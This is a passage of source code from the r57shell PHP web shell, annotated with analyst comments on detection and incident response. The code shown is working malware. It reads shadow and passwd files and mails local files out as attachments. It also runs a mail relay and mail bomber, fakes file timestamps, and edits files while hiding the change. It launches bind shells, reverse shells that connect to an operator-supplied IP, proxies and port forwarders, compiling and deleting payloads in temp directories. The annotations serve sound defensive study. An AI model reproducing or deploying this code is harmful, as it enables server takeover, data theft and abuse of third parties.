4186echo "<br>";
4187
4188
4189
4190echo ws(2)."PHP version: <b>".@phpversion()."</b>";
4191
4192$curl_on = @function_exists('curl_version');
4193
4194echo ws(2);
4195
4196echo "cURL: <b>".(($curl_on)?("<font color=red>ON</font>"):("<font color=green>OFF</font>"));
4197
4198echo "</b>".ws(2);
4199
4200echo "MySQL: <b>";
4201
4202$mysql_on = @function_exists('mysql_connect');
4203
4204if($mysql_on){
4205
4206echo "<font color=red>ON</font>"; } else { echo "<font color=green>OFF</font>"; }
4207
4208echo "</b>".ws(2);
4209
4210echo "MSSQL: <b>";
4211
4212$mssql_on = @function_exists('mssql_connect');
4213
4214if($mssql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4215
4216echo "</b>".ws(2);
4217
4218echo "PostgreSQL: <b>";
4219
4220$pg_on = @function_exists('pg_connect');
4221
4222if($pg_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4223
4224echo "</b>".ws(2);
4225
4226echo "Oracle: <b>";
4227
4228$ora_on = @function_exists('ocilogon');
4229
4230if($ora_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4231
4232echo "</b>".ws(2);
4233
4234echo "MySQLi: <b>";
4235
4236$mysqli_on = @function_exists('mysqli_connect');
4237
4238if($mysqli_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4239
4240echo "</b>".ws(2);
4241
4242echo "mSQL: <b>";
4243
4244$msql_on = @function_exists('msql_connect');
4245
4246if($msql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4247
4248echo "</b>".ws(2);
4249
4250echo "SQLite: <b>";
4251
4252$sqlite_on = @function_exists('sqlite_open');
4253
4254if($sqlite_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4255
4256echo "</b><br>".ws(2);
4257
4258
4259
4260echo "Safe_mode: <b>";
4261
4262echo (($safe_mode)?("<font color=red>ON</font>"):("<font color=green>OFF</font>"));
4263
4264echo "</b>".ws(2);
4265
4266echo "Open_basedir: <b>";
4267
4268if($open_basedir) { if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";}else {echo "<font color=red>$df</font></b>";};}
4269
4270else {echo "<font color=green>NONE</font></b>";}
4271
4272echo ws(2)."Safe_exec_dir: <b>";
4273
4274if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};}
4275
4276else {echo "<font color=red>ini_get disable!</font></b>";}
4277
4278echo ws(2)."Safe_gid: <b>";
4279
4280if(@function_exists('ini_get')) { if (@ini_get('safe_mode_gid')) {echo "<font color=green>ON</font></b>";}else {echo "<font color=red>OFF</font></b>";};}
4281
4282else {echo "<font color=red>ini_get disable!</font></b>";}
4283
4284echo ws(2)."Safe_include_dir: <b>";
4285
4286if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};}
4287
4288else {echo "<font color=red>ini_get disable!</font></b>";}
4289
4290echo ws(2)."Sql.safe_mode: <b>";
4291
4292if(@function_exists('ini_get')) { if (@ini_get('sql.safe_mode')) {echo "<font color=red>ON</font></b>";}else {echo "<font color=green>OFF</font></b>";};}
4293
4294else {echo "<font color=red>ini_get disable!</font></b>";}
4295
4296
4297
4298echo "<br>".ws(2);
4299
4300echo "Disable functions : <b>";$df='ini_get disable!';
4301
4302if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
4303
4304
4305
4306if(@function_exists('diskfreespace')){$free = @diskfreespace($dir);}
4307
4308elseif(@function_exists('disk_free_space')){$free = @disk_free_space($dir);}else{$free = 'Unknown';}
4309
4310if (!$free) {$free = 0;}
4311
4312$all = @disk_total_space($dir);
4313
4314if (!$all) {$all = 0;}
4315
4316echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
4317
4318
4319
4320
4321
4322if($ust_u){echo "<br>".ws(2).$lang[$language.'_text137'].": <font color=blue>".$ust_u."</font>";};
4323
4324
4325
4326if($ust_d){echo "<br>".ws(2).$lang[$language.'_text138'].": <font color=red>".$ust_d."</font>";};
4327
4328
4329
4330if($downloader){echo "<br>".ws(2).$lang[$language.'_text142'].": <font color=blue>".$downloader."</font>";};
4331
4332
4333
4334
4335
// Analyst note: quick-action menu. Every link targets the script itself with a query string
// that is a bare integer (?1 ... ?12 here, ?13 ... ?34 in the block that follows). The handler
// mapping those numbers to actions is outside this excerpt; the titles show the intent
// (phpinfo, php.ini, syslog.conf, resolv, hosts, shadow, passwd, tmp listing, self-delete).
// Log hunting: GET requests to a single PHP file whose entire query string is a small integer,
// especially several different integers from one client in a short window.
// $_SERVER['PHP_SELF'] is written into the href unescaped.
4336echo "<br>".ws(2)."</b>";
4337
4338echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?1' title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
4339
4340echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?2' title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
4341
4342echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?3' title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
4343
4344echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?4' title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
4345
4346if(!$unix) {
4347
4348 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?5' title=\"".$lang[$language.'_text50']."\"><b>systeminfo</b></a> ".$rb;
4349
4350}else{
4351
4352 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?6' title=\"View syslog.conf\"><b>syslog</b></a> ".$rb;
4353
4354 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?7' title=\"View resolv\"><b>resolv</b></a> ".$rb;
4355
4356 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?8' title=\"View hosts\"><b>hosts</b></a> ".$rb;
4357
4358 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?9' title=\"View shadow\"><b>shadow</b></a> ".$rb;
4359
4360 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?10' title=\"".$lang[$language.'_text95']."\"><b>passwd</b></a> ".$rb;
4361
4362}
4363
4364echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?11' title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
4365
4366echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?12' title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb;
4367
4368
4369
4370if($unix && !$safe_mode)
4371
4372{
4373
4374 echo "<br>".ws(2)."</b>";
4375
4376 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?13' title=\"View procinfo\"><b>procinfo</b></a> ".$rb;
4377
4378 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?14' title=\"View proc version\"><b>version</b></a> ".$rb;
4379
4380 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?15' title=\"View mem free\"><b>free</b></a> ".$rb;
4381
4382 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?16' title=\"View dmesg\"><b>dmesg</b></a> ".$rb;
4383
4384 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?17' title=\"View vmstat\"><b>vmstat</b></a> ".$rb;
4385
4386 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?18' title=\"View lspci\"><b>lspci</b></a> ".$rb;
4387
4388 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?19' title=\"View lsdev\"><b>lsdev</b></a> ".$rb;
4389
4390 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?20' title=\"View interrupts\"><b>interrupts</b></a> ".$rb;
4391
4392 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?21' title=\"View realise1\"><b>realise1</b></a> ".$rb;
4393
4394 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?22' title=\"View realise2\"><b>realise2</b></a> ".$rb;
4395
4396 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?23' title=\"View lsattr -va\"><b>lsattr</b></a> ".$rb;
4397
4398
4399
4400 echo "<br>".ws(2)."</b>";
4401
4402 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?24' title=\"View w\"><b>w</b></a> ".$rb;
4403
4404 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?25' title=\"View who\"><b>who</b></a> ".$rb;
4405
4406 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?26' title=\"View uptime\"><b>uptime</b></a> ".$rb;
4407
4408 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?27' title=\"View last -n 10\"><b>last</b></a> ".$rb;
4409
4410 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?28' title=\"View ps -aux\"><b>ps aux</b></a> ".$rb;
4411
4412 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?29' title=\"View service\"><b>service</b></a> ".$rb;
4413
4414 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?30' title=\"View ifconfig\"><b>ifconfig</b></a> ".$rb;
4415
4416 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?31' title=\"View netstat -a\"><b>netstat</b></a> ".$rb;
4417
4418 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?32' title=\"View fstab\"><b>fstab</b></a> ".$rb;
4419
4420 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?33' title=\"View fdisk -l\"><b>fdisk</b></a> ".$rb;
4421
4422 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?34' title=\"View df -h\"><b>df -h</b></a> ".$rb;
4423
4424}
4425
4426
4427
4428echo '</font></td></tr><table>
4429
4430<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
4431
4432<tr><td align=right width=100>';
4433
4434echo $font;
4435
4436
4437
4438if($unix){
4439
4440echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
4441
4442echo "</td><td>";
4443
4444echo "<font face=Verdana size=-2 color=red><b>";
4445
4446echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
4447
4448echo ws(3).$sysctl."<br>";
4449
4450echo ws(3).ex('echo $OSTYPE')."<br>";
4451
4452echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
4453
4454if(!empty($id)) { echo ws(3).$id."<br>"; }
4455
4456else if(@function_exists('posix_geteuid') && @function_exists('posix_getegid') && @function_exists('posix_getgrgid') && @function_exists('posix_getpwuid'))
4457
4458 {
4459
4460 $euserinfo = @posix_getpwuid(@posix_geteuid());
4461
4462 $egroupinfo = @posix_getgrgid(@posix_getegid());
4463
4464 echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
4465
4466 }
4467
4468else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
4469
4470echo ws(3).$dir;
4471
4472echo ws(3).'( '.perms(@fileperms($dir)).' )';
4473
4474echo "</b></font>";
4475
4476}
4477
4478else
4479
4480{
4481
4482echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
4483
4484echo "</td><td>";
4485
4486echo "<font face=Verdana size=-2 color=red><b>";
4487
4488echo ws(3).@substr(@php_uname(),0,120)."<br>";
4489
4490echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
4491
4492echo ws(3).@getenv("USERNAME")."<br>";
4493
4494echo ws(3).$dir;
4495
4496echo "<br></font>";
4497
4498}
4499
4500echo "</font>";
4501
4502echo "</td></tr></table>";
4503
4504
4505
// Analyst note: cmd=mail sends one message through PHP mail() with recipient, subject, body
// and From header all taken from the POST body. This turns the compromised host into a mail
// relay; the From value is concatenated into the header string unfiltered.
// Detection: MTA logs showing mail submitted by the web-server account to unrelated recipients.
// Mitigation: disable mail() for sites that do not send mail, or force a fixed envelope sender.
4506if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
4507
4508 {
4509
4510 $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
4511
 // err() is defined outside this excerpt; the code passed is 6 plus mail()'s boolean result.
4512 err(6+$res);
4513
 // Clearing cmd stops the later handlers in this script from treating the request as a command.
4514 $_POST['cmd']="";
4515
4516 }
4517
// Analyst note: cmd=mail_file reads a local file named in POST `loc_file` and mails it as an
// attachment, i.e. file exfiltration over SMTP.
// moreread(), readzlib(), compress() and mailattach() are defined outside this excerpt.
// Indicators present in this block: default subject "file from r57shell" and default sender
// "billy@microsoft.com", used when the operator leaves those fields empty. Both are worth
// searching for in outbound mail logs and queue files.
4518if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
4519
4520 {
4521
 // Two read attempts (plain, then zlib-based); on failure err(1, path) is called and cmd is cleared.
4522 if($file=moreread($_POST['loc_file'])){ $filedump = $file; }
4523
4524 else if ($file=readzlib($_POST['loc_file'])) { $filedump = $file; } else { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
4525
4526 if(!empty($_POST['cmd']))
4527
4528 {
4529
4530 $filename = @basename($_POST['loc_file']);
4531
4532 $content_encoding=$mime_type='';
4533
 // NOTE(review): $mime_type is still '' when $attach is built unless compress() sets it by
 // reference or through globals; confirm against the helper's definition.
4534 compress($filename,$filedump,$_POST['compress']);
4535
4536 $attach = array(
4537
4538 "name"=>$filename,
4539
4540 "type"=>$mime_type,
4541
4542 "content"=>$filedump
4543
4544 );
4545
4546 if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
4547
4548 if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
4549
4550 $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
4551
4552 err(6+$res);
4553
4554 $_POST['cmd']="";
4555
4556 }
4557
4558 }
4559
// Analyst note: cmd=mail_bomber sends the same message `mail_flood` times, padding each body
// with 1024 * `mail_size` spaces. Count and size are taken from the POST body with no upper bound.
// Impact on the compromised host: outbound mail queue growth and likely blocklisting of its IP.
// Detection/mitigation: per-account rate limits on the local MTA and alerting on queue depth;
// a sudden run of identical-size messages from the web-server account matches this loop.
4560if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_bomber" && !empty($_POST['mail_flood']) && !empty($_POST['mail_size']))
4561
4562 {
4563
4564 for($h=1;$h<=$_POST['mail_flood'];$h++){
4565
4566 $res = mail($_POST['to'],$_POST['subj'],$_POST['text'].str_repeat(" ", 1024*$_POST['mail_size']),"From: ".$_POST['from']."\r\n");
4567
4568 }
4569
 // Only the result of the last mail() call is reported.
4570 err(6+$res);
4571
4572 $_POST['cmd']="";
4573
4574 }
4575
// Analyst note: cmd=find_text rewrites $_POST['cmd'] into a `find ... | xargs grep -E` pipeline
// built from POST `s_dir`, `s_mask` and `s_text`. The code that runs $_POST['cmd'] is outside
// this excerpt. The operator's search terms therefore appear verbatim in the command line.
// Detection: process-execution logging (auditd execve, EDR) showing find/xargs/grep started by
// the web-server account.
4576if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
4577
4578{
4579
4580$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
4581
4582}
4583
// Analyst note: cmd=ch_ changes owner, group or mode of the path in POST `param1` according to
// POST `what` (own / grp / mod). Failures are suppressed with @ and nothing is reported back.
// Incident response: after finding this shell, compare ownership and permission bits of web
// content against a known-good deployment; mode changes made here leave no application log.
4584if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
4585
4586 {
4587
4588 switch($_POST['what'])
4589
4590 {
4591
4592 case 'own':
4593
4594 @chown($_POST['param1'],$_POST['param2']);
4595
4596 break;
4597
4598 case 'grp':
4599
4600 @chgrp($_POST['param1'],$_POST['param2']);
4601
4602 break;
4603
4604 case 'mod':
4605
 // param2 is parsed as an octal string (base 8) before being passed to chmod().
4606 @chmod($_POST['param1'],intval($_POST['param2'], 8));
4607
4608 break;
4609
4610 }
4611
4612 $_POST['cmd']="";
4613
4614 }
4615
// Analyst note: cmd=mk creates or deletes a file or directory at the path in POST `mk_name`
// (`what` = file|dir, `action` = create|delete). Paths are used as given, so the reach is
// whatever the web-server account can write to.
// morewrite() and err() are defined outside this excerpt.
// Mitigation: keep the document root read-only for the web-server account and alert on new
// .php files appearing in writable upload or cache directories.
4616if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
4617
4618 {
4619
4620 switch($_POST['what'])
4621
4622 {
4623
4624 case 'file':
4625
4626 if($_POST['action'] == "create")
4627
4628 {
4629
 // New files are seeded with the literal text 'your text here' (a content indicator for
 // leftover files), then the request is redirected into the edit_file handler below.
4630 if(@file_exists($_POST['mk_name']) || !morewrite($_POST['mk_name'],'your text here')) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
4631
4632 else {
4633
4634 $_POST['e_name'] = $_POST['mk_name'];
4635
4636 $_POST['cmd']="edit_file";
4637
4638 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
4639
4640 }
4641
4642 }
4643
4644 else if($_POST['action'] == "delete")
4645
4646 {
4647
4648 if(@unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
4649
4650 $_POST['cmd']="";
4651
4652 }
4653
4654 break;
4655
4656 case 'dir':
4657
4658 if($_POST['action'] == "create"){
4659
4660 if(@mkdir($_POST['mk_name']))
4661
4662 {
4663
4664 $_POST['cmd']="";
4665
4666 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
4667
4668 }
4669
4670 else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
4671
4672 }
4673
4674 else if($_POST['action'] == "delete"){
4675
4676 if(@rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
4677
4678 $_POST['cmd']="";
4679
4680 }
4681
4682 break;
4683
4684 }
4685
4686 }
4687
4688
4689
4690
4691
// Analyst note: cmd=touch is a timestamp-manipulation ("timestomping") feature. It sets the
// access and modification time of POST `file_name` either to a date assembled from POST fields
// or to the mtime of a reference file (`file_name_r`).
// Forensics: on a host where this shell was present, mtime/atime of web content cannot be
// trusted for timeline building. On POSIX filesystems touch() does not let the caller choose
// the inode change time, so a ctime later than mtime is a useful inconsistency to look for,
// alongside backups, file-integrity baselines and web access logs.
4692if(!empty($_POST['cmd']) && $_POST['cmd']=="touch")
4693
4694{
4695
4696if(!$_POST['file_name_r'])
4697
4698 {
4699
 // The date string is parsed by strtotime(); a parse failure yields false, which is then
 // passed to touch() with errors suppressed.
4700 $datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds";
4701
4702 $datar = @strtotime($datar);
4703
4704 @touch($_POST['file_name'],$datar,$datar);}
4705
4706else{
4707
 // Copies the reference file's mtime into both the mtime and atime of the target.
4708 @touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r']));
4709
4710}
4711
4712$_POST['cmd']="";
4713
4714}
4715
4716
4717
4718
4719
// Analyst note: cmd=edit_file loads the file in POST `e_name` and renders it in a form that
// posts back with cmd=save_file. It can read any file the web-server account can read
// (configuration files holding database credentials are the usual concern).
// moreread() and readzlib() are defined outside this excerpt.
// File contents are HTML-escaped, but the file name and $dir are written into the page and into
// single-quoted attributes unescaped.
// The script ends with exit() after printing the editor, so nothing later in the file runs.
4720if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
4721
4722 {
4723
 // $only_read is set when the file is not writable or was only readable through readzlib();
 // it replaces the submit button with a notice further down.
4724 if(@is_dir($_POST['e_name'])){ err(1,$_POST['e_name']); $_POST['cmd']=""; }
4725
4726 elseif($file=moreread($_POST['e_name'])) { $filedump = $file; if(!@is_writable($_POST['e_name'])) { $only_read = 1; }; }
4727
4728 elseif($file=readzlib($_POST['e_name'])) { $filedump = $file; $only_read = 1; }
4729
4730 elseif(@file_exists($_POST['e_name'])) {$filedump = 'NONE'; if(!@is_writable($_POST['e_name'])) { $only_read = 1; };}
4731
4732 else { err(1,$_POST['e_name']); $_POST['cmd']=""; }
4733
4734 if(!empty($_POST['cmd']))
4735
4736 {
4737
4738 echo $table_up3;
4739
4740 echo $font;
4741
4742 echo "<form name=save_file method=post>";
4743
4744 echo ws(3)."<b>".$_POST['e_name']."</b>";
4745
4746 echo "<div align=center><textarea name=e_text cols=121 rows=24>";
4747
4748 echo @htmlspecialchars($filedump);
4749
4750 echo "</textarea>";
4751
4752 echo "<input type=hidden name=e_name value='".$_POST['e_name']."'>";
4753
4754 echo "<input type=hidden name=dir value='".$dir."'>";
4755
4756 echo "<input type=hidden name=cmd value=save_file>";
4757
4758 echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
4759
4760 echo "</div>";
4761
4762 echo "</font>";
4763
4764 echo "</form>";
4765
4766 echo "</td></tr></table>";
4767
4768 exit();
4769
4770 }
4771
4772 }
4773
// Analyst note: cmd=save_file overwrites the file in POST `e_name` with POST `e_text`, then
// restores the modification time recorded before the write. A file altered through this
// handler keeps its old mtime, so "recently modified" searches will miss it.
// Forensics: rely on content hashes against a known-good baseline or version control, and on
// inode change time, rather than mtime. morewrite() is defined outside this excerpt.
4774if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
4775
4776 {
4777
 // Captured before any write so it can be put back at the end of the block.
4778 $mtime = @filemtime($_POST['e_name']);
4779
4780 if(!@is_writable($_POST['e_name'])) { err(0,$_POST['e_name']); }
4781
4782 else {
4783
 // On Unix hosts CRLF line endings from the browser form are converted to LF.
4784 if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
4785
4786 morewrite($_POST['e_name'],$_POST['e_text']);
4787
4788 $_POST['cmd']="";
4789
4790 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
4791
4792 }
4793
 // Runs on both paths, also when the file was not writable; sets mtime and atime to $mtime.
4794 @touch($_POST['e_name'],$mtime,$mtime);
4795
4796 }
4797
4798
4799
4800
4801
// Analyst note: starts the embedded Perl HTTP proxy. $prx_pl is the base64 string assigned
// earlier in the file; cf() (defined outside this excerpt) presumably decodes it and writes it
// to $tempdir.'prxpl'. The script is launched in the background with the POSTed port and the
// file is unlinked immediately, so the process keeps running with no script left on disk.
// Detection: a perl process owned by the web-server account holding a listening TCP socket,
// whose script path no longer exists; short-lived file named `prxpl` in a temp directory.
// Mitigation: default-deny inbound ports on web hosts; deny exec of interpreters to the web tier.
4802if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl"))
4803
4804{
4805
4806 cf($tempdir.'prxpl',$prx_pl);
4807
4808 $p2=which("perl");
4809
 // proxy_port is concatenated into the shell command unquoted and unvalidated.
4810 $blah = ex($p2.' '.$tempdir.'prxpl '.$_POST['proxy_port'].' &');
4811
4812 @unlink($tempdir.'prxpl');
4813
 // Replaces cmd with a process listing so the operator sees whether the proxy started.
4814 $_POST['cmd']="ps -aux | grep prxpl";
4815
4816}
4817
// Analyst note: bind shell, C variant. Writes $port_bind_bd_c (defined outside this excerpt)
// to $tempdir.'bd.c', compiles it with gcc, deletes the source, starts the binary in the
// background with the POSTed port and password as arguments, then deletes the binary.
// Detection: gcc executed by the web-server account; an executable created and run from a temp
// directory; a process named `bd` with a listening socket and a deleted executable. The port
// and password are visible in the process arguments while it runs.
// Mitigation: no compiler on production web hosts, temp directories mounted noexec,
// default-deny inbound firewalling.
4818if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
4819
4820{
4821
4822 cf($tempdir.'bd.c',$port_bind_bd_c);
4823
4824 $blah = ex('gcc -o '.$tempdir.'bd '.$tempdir.'bd.c');
4825
4826 @unlink($tempdir.'bd.c');
4827
4828 $blah = ex($tempdir.'bd '.$_POST['port'].' '.$_POST['bind_pass'].' &');
4829
4830 @unlink($tempdir.'bd');
4831
4832 $_POST['cmd']="ps -aux | grep bd";
4833
4834}
4835
// Analyst note: bind shell, Perl variant. Writes $port_bind_bd_pl (defined outside this
// excerpt) to $tempdir.'bdpl', runs it with perl in the background and unlinks the file.
// `bind_pass` must be present for this branch to run, but only the port is passed on the
// command line; whether the listener enforces a password cannot be told from this excerpt.
// Detection: perl started by the web-server account with a temp-directory script argument
// `bdpl`, followed by a new listening socket owned by that account.
4836if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
4837
4838{
4839
4840 cf($tempdir.'bdpl',$port_bind_bd_pl);
4841
4842 $p2=which("perl");
4843
4844 $blah = ex($p2.' '.$tempdir.'bdpl '.$_POST['port'].' &');
4845
4846 @unlink($tempdir.'bdpl');
4847
4848 $_POST['cmd']="ps -aux | grep bdpl";
4849
4850}
4851
// Analyst note: reverse ("back-connect") shell, Perl variant. Writes $back_connect (defined
// outside this excerpt) to $tempdir.'back', runs it with perl passing the POSTed IP and port,
// and unlinks the script. The connection is outbound from the server.
// Detection: outbound TCP from the web-server account to an arbitrary address and port shortly
// after a POST to a PHP file; the destination is in the POST body and in the process arguments.
// Mitigation: egress filtering on the web tier so only required destinations are reachable.
4852if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
4853
4854{
4855
4856 cf($tempdir.'back',$back_connect);
4857
4858 $p2=which("perl");
4859
4860 $blah = ex($p2.' '.$tempdir.'back '.$_POST['ip'].' '.$_POST['port'].' &');
4861
4862 @unlink($tempdir.'back');
4863
 // cmd becomes an echo of a status line; the status text itself ("Now script try connect
 // to ...") is a string indicator for response bodies.
4864 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
4865
4866}
4867
// Analyst note: reverse shell, C variant. Writes $back_connect_c (defined outside this
// excerpt) to $tempdir.'back.c', compiles it to $tempdir.'backc', deletes the source and runs
// the binary with the POSTed IP and port.
// Forensic artifact: the cleanup call below removes `back`, not `backc`, so the compiled
// binary stays in the temp directory and can be collected and hashed during incident response.
// Detection and mitigation are the same as for the other C payloads: gcc run by the web-server
// account, executables in temp directories, and unexpected outbound connections.
4868if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
4869
4870{
4871
4872 cf($tempdir.'back.c',$back_connect_c);
4873
4874 $blah = ex('gcc -o '.$tempdir.'backc '.$tempdir.'back.c');
4875
4876 @unlink($tempdir.'back.c');
4877
4878 $blah = ex($tempdir.'backc '.$_POST['ip'].' '.$_POST['port'].' &');
4879
4880 @unlink($tempdir.'back');
4881
4882 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
4883
4884}
4885
// Analyst note: port forwarder ("datapipe"), Perl variant. Writes the base64-embedded script
// $datapipe_pl to $tempdir.'dp', runs it with perl passing local port, remote host and remote
// port, and unlinks the file. The compromised server then relays connections from its own
// port to another host, a pivot into networks the server can reach.
// Detection: a new listener owned by the web-server account paired with outbound connections
// to one fixed host and port; a perl process whose script file `dp` has been deleted.
// Mitigation: segment the web tier so it cannot open arbitrary connections to internal hosts.
4886if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
4887
4888{
4889
4890 cf($tempdir.'dp',$datapipe_pl);
4891
4892 $p2=which("perl");
4893
4894 $blah = ex($p2.' '.$tempdir.'dp '.$_POST['local_port'].' '.$_POST['remote_host'].' '.$_POST['remote_port'].' &');
4895
4896 @unlink($tempdir.'dp');
4897
4898 $_POST['cmd']="ps -aux | grep dp";
4899
4900}
4901
// Analyst note: port forwarder, C variant. Writes $datapipe_c to $tempdir.'dpc.c', compiles
// it with gcc to $tempdir.'dpc', removes the source, starts the binary in the background and
// removes the binary. The argument order differs from the Perl variant: local port, remote
// port, then remote host.
// Detection: gcc run by the web-server account; a process named `dpc` with a deleted
// executable holding both a listening socket and an outbound connection.
4902if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
4903
4904{
4905
4906 cf($tempdir.'dpc.c',$datapipe_c);
4907
4908 $blah = ex('gcc -o '.$tempdir.'dpc '.$tempdir.'dpc.c');
4909
